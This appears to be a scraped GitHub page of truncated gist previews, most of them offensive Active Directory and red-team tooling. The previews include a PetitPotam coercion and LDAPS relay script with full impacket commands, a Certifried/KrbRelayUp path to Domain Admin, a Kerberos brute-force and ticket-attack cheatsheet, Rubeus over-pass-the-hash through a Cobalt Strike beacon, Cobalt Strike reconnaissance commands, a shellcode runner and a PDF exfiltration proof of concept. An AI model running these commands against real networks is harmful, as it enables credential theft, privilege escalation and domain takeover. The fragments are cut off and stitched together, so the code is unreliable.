
Mimiron amirr0r
@dirkjanm
dirkjanm / schemaquery.py
Created July 11, 2022 15:55
Query property sets from the AD schema
#!/usr/bin/env python
####################
#
# Copyright (c) 2022 Dirk-jan Mollema (@_dirkjan)
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
@tothi
tothi / certifried_with_krbrelayup.md
Last active December 18, 2024 19:47
Certifried combined with KrbRelayUp: non-privileged domain user to Domain Admin without adding/pre-owning computer accounts

Certifried combined with KrbRelayUp

Certifried (CVE-2022-26923) gives Domain Admin from a non-privileged user, with the requirement of adding computer accounts or owning a computer account. Kerberos Relay targeting LDAP and Shadow Credentials gives a non-privileged domain user on a domain-joined machine local admin access on (aka owning) the machine. The combination of these two: a non-privileged domain user escalating to Domain Admin without the requirement of adding/owning computer accounts.

The attack below uses only Windows (no Linux tools interacting with the Domain), simulating a real-world attack scenario.

Prerequisites:

@zimnyaa
zimnyaa / webclient-rbcd.sh
Last active February 28, 2025 09:18
PetitPotam WebDAV coerced authentication + LDAPS relaying
# setting up a DNS record in the domain, the zone I required was found in ForestDNSZones
python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local
# setting up an LDAPS relay to grant RBCD to a computer account we have
# in my case MAQ = 0, so I escalated on a domain workstation and used it
sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da
# PetitPotam to WebDAV with domain credentials (not patched)
# DO NOT use FQDN here
python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER
@peewpw
peewpw / shellcode_x64.py
Created May 12, 2020 16:03
64 bit Python3 compatible shellcode runner
# 64 bit compatible shellcode launcher
#
# The versions of this I've attempted to use appear to only work in 32-bit Python (at least for 3.7-8).
# Hence this was needed to solve a problem.
#
# based on work from:
# http://www.debasish.in/2012/04/execute-shellcode-using-python.html
# https://www.christophertruncer.com/shellcode-manipulation-and-injection-in-python-3/
# https://stackoverflow.com/a/61258392
#
@Areizen
Areizen / mupdf_encrypted_exfiltration.py
Created April 30, 2020 17:48
POC of pdf-insecurity.com
from binascii import hexlify
import sys
import re
# PDF TEMPLATE: the object index should be shifted enough to avoid a collision with the number of the object
# we want to exfiltrate
PDF_TEMPLATE = """%PDF-2.0
100 0 obj
@TarlogicSecurity
TarlogicSecurity / kerberos_attacks_cheatsheet.md
Created May 14, 2019 13:33
A cheatsheet with commands that can be used to perform Kerberos attacks

Kerberos cheatsheet

Bruteforcing

With kerbrute.py:

python kerbrute.py -domain <domain_name> -users <users_file> -passwords <passwords_file> -outputfile <output_file>

With Rubeus version with brute module:

@seajaysec
seajaysec / customqueries.json
Last active February 12, 2025 16:58
bloodhound custom queries
{
  "queries": [{
    "name": "List all owned users",
    "queryList": [{
      "final": true,
      "query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m"
    }]
  },
  {
    "name": "List all owned computers",
@HarmJ0y
HarmJ0y / gist:dc379107cfb4aa7ef5c3ecbac0133a02
Last active September 29, 2024 12:57
Over-pass-the-hash with Rubeus and Beacon
##### IF ELEVATED:
# grab a TGT b64 blob with a valid NTLM/rc4 (or /aes256:X)
beacon> execute-assembly /home/specter/Rubeus.exe asktgt /user:USER /rc4:NTLM_HASH
# decode the base64 blob to a binary .kirbi
$ base64 -d ticket.b64 > ticket.kirbi
# sacrificial logon session (to prevent the TGT from overwriting your current logon session's TGT)
beacon> make_token DOMAIN\USER PassWordDoesntMatter
@HarmJ0y
HarmJ0y / cobaltstrike_sa.txt
Created September 28, 2018 22:22
Cobalt Strike Situational Awareness Commands
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
@Ari-Roda
Ari-Roda / scapy
Created September 17, 2018 08:16
from scapy.all import *  # import the scapy module into python
# sklearn.externals.joblib was removed from scikit-learn; use the standalone joblib package instead
import joblib
import pandas as pd
# mapping of IP protocol numbers to protocol names
thisdict = {1: "icmp", 3: "ggp", 6: "tcp", 11: "nvp", 12: "pup", 17: "udp", 28: "irtp", 39: "tp++", 41: "ipv6", 42: "sdrp", 46: "rsvp", 47: "gre", 53: "swipe", 55: "mobile", 56: "tlsp", 57: "skip", 59: "ipv6-no", 77: "sun-nd", 87: "tcf", 89: "ospf", 103: "pim", 105: "scps", 129: "iplt", 132: "sctp",
133: "fc", 82: "secure-vmtp", 94: "ipip", 108: "ipcomp", 85: "nsfnet-igp", 100: "gmtp", 25: "leaf-1", 98: "encap", 95: "micp", 84: "ttp", 86: "dgp", 32: "merit-inp", 10: "bbn-rcc", 109: "snp", 15: "xnet",
44: "ipv6-frag", 79: "wb-expak", 69: "sat-mon", 7: "cbt", 107: "a/n", 23: "trunk-1", 70: "visa", 27: "rdp", 18: "mux", 104: "aris", 20: "hmp", 75: "pvp", 64: "sat-expak", 121: "smp", 22: "xns-idp", 30: "netblt",
126: "crtp", 16: "chaos", 131: "pipe", 31: "mfe-nsp", 40: "il", 110: "compaq-peer", 92: "mtp", 120: "uti", 90: "sprite-rpc", 24: "trunk-2", 74: "wsn", 37: "ddp", 76: "br-sat-mon", 80: "iso-ip", 8: "egp",